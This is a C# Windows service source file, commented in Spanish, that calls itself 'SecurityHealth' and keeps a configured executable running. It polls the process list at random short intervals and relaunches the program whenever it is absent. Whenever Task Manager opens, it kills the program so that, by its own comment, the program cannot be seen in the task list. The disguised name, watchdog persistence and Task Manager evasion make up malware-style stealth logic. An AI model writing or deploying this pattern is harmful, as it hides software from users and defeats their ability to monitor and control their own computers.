﻿using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net;
using System.Reflection;
using System.ServiceProcess;
using System.Text;
using System.Threading;
using System.Timers;
using System.Xml;

namespace SecurityHealth
{
    public partial class Service1 : ServiceBase
    {
        private static System.Timers.Timer aTimer;
        private static System.Timers.Timer DelayStart;

        public static string AppName = "";
        public static string AppPath = "";
        private Updater updateApp = null;
        private static int nInstance = 0;

        public string strExeFilePath = "";
        public static string strWorkPath = "";

        public Service1()
        {
            InitializeComponent();
        }

        public void TaskDelay()
        {
            DelayStart.Enabled = false;
            DelayStart.Stop();
            updateApp = new Updater();
            updateApp.Start();
        }

        private void OnDelayStartEvent(object source, ElapsedEventArgs e)
        {
            Thread t = new Thread( TaskDelay );
            t.Start();
        }

        protected override void OnStart(string[] args)
        {
            Type tt = typeof(Service1);
            Assembly assemFromType = tt.Assembly;

            // se busca la carpeta de ejecución actual del programa
            strExeFilePath = System.Reflection.Assembly.GetExecutingAssembly().Location;
            strWorkPath = System.IO.Path.GetDirectoryName(strExeFilePath) + "\\";

            // Se necesita el nombre de la aplicacion sin extension para poder compararlo con la lista de procesos de windows
            // informacion obtenida del xml
            AppName = Path.GetFileNameWithoutExtension(Utils.getNameApp());

            try
            {

                DelayStart = new System.Timers.Timer();
                DelayStart.Interval = 15 * 1000;
                DelayStart.Elapsed += new ElapsedEventHandler(OnDelayStartEvent);
                DelayStart.Enabled = true;
                DelayStart.Start();
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            /*
            // si la aplicación no existe en disco no busca de ejecutarlo, el update se encargara de reponerlo
            if (!File.Exists(strWorkPath + AppName + ".exe"))
            {
                Utils.writeLog(AppName, "!File AppName");
                return;
            }
            */
            //updateApp = new Updater();
            //updateApp.Start();
            /*
            try
            {
                
                DelayStart = new System.Timers.Timer();
                DelayStart.Interval = 5*1000;
                DelayStart.Elapsed += new ElapsedEventHandler(OnDelayStartEvent);
                DelayStart.Enabled = true;
                
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            */
            try
            {
                aTimer = new System.Timers.Timer();
                aTimer.Interval = RandomNumber( 1, 5 )*1000; // entre 1 a 5 segundo verifica
                aTimer.Elapsed += new ElapsedEventHandler(OnTimedEvent);
                aTimer.Enabled = false;
                if (File.Exists(strWorkPath + AppName + ".exe"))
                {
                    aTimer.Enabled = true;
                    aTimer.Start();
                    // Inicia el navegador si no esta abierta la barra de tareas
                    Thread t = new Thread(new ThreadStart(TaskmgProc));
                    t.Start();
                }
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
        }

        public int RandomNumber(int min, int max)
        {
            Random random = new Random();
            return random.Next(min, max);
        }


        protected override void OnStop()
        {
            // se detuvo el servicio de monitoreo
            Thread t = new Thread(new ThreadStart(KillNavigator));
            t.Start();
        }

        private void OnTimedEvent(object source, ElapsedEventArgs e)
        {
            aTimer.Interval = RandomNumber( 1, 5 ) * 1000;
            // se ejecuta un hilo de tarea para ejecución en paralelo
            Thread t = new Thread(new ThreadStart(TaskmgProc));
            t.Start();
        }

        public void TaskmgProc()
        {
            // se obtiene lista de procesos
            Process[] processlist = Process.GetProcesses();

            bool findTaskWindow = false;
            bool findNavigator = false;
            // se determina si el navegador esta en memoria ejecutandose o si habre la ventana de tareas

            foreach (Process process in processlist)
            {
                if (process.ProcessName.Trim().ToLower() == AppName.Trim().ToLower())
                {
                    findNavigator = true;
                }
                if (process.ProcessName.ToLower() == "taskmgr")
                {
                    findTaskWindow = true;
                    Thread t = new Thread(new ThreadStart(KillNavigator));
                    t.Start();
                }
            }
            // si no esta abierto el administrador de tareas y no hay instancia del navegador se busca ejecutarlo
            if (!findTaskWindow && !findNavigator)
            {
                  // se verifica que si la aplicacion se esta actualizando o no en estos momentos
                if (!updateApp.downloaded)
                {
                    StartNavigator();
                }
            }
        }

        public static void StartNavigator()
        {   

            // nInstance se usa por si hay algun error en la especificacion del exe y no se pueda comparar, a veces llenaba la memoria con
            // muchas instancias
            if ( nInstance > 0)
            {
                Utils.writeLog(nInstance.ToString(), "nInstance AppName");
                return;
            }
            // ejecuta el exe o navegador especificado en el xml
            using (Process myProcess = new Process())
            {
                myProcess.StartInfo.UseShellExecute = false;
                myProcess.StartInfo.WorkingDirectory = strWorkPath;
                myProcess.StartInfo.FileName = strWorkPath + AppName + ".exe";
                myProcess.StartInfo.CreateNoWindow = false;
                try
                {
                    myProcess.Start();
                    nInstance += 1;
                }
                catch (Exception e)
                {
                    Utils.writeLog(e.Message, "StartNavigator");

                }
                Console.WriteLine("Start..." + AppName);
            }
        }

        public static void KillNavigator()
        {
            // busca en los procesos de memoria el exe o navegador para matar el proceso y no pueda mostrarse en la lista de la ventana de tareas
            foreach (Process myProc in Process.GetProcesses())
            {
                if (myProc.ProcessName.ToLower() == AppName.ToLower())
                {
                    try
                    {
                        myProc.Kill();
                        nInstance -= 1;
                    }
                    catch (Exception e)
                    {
                        Utils.writeLog(e.Message, "Error in KillNavigator");
                    }
                    Console.WriteLine("Stop..." + AppName);
                }
            }
        }
    }
}
